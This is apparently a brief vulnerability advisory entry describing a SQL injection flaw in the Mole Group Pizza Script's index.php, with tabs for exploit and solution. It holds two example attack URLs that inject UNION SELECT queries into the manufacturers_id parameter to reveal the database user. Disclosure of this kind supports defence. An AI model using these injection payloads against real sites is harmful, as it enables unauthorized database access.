Mole Group Pizza Script 'index.php' SQL Injection Vulnerability

info
discussion
exploit
solution
references

Mole Group Pizza Script 'index.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/index.php?manufacturers_id=-1+union+select+user()--&osCsid=0d4d9ec8a0cf2aba5f633bb4691aea2c

http://www.example.com/index.php?manufacturers_id=-1+union+select+convert(user()+using+latin1)/*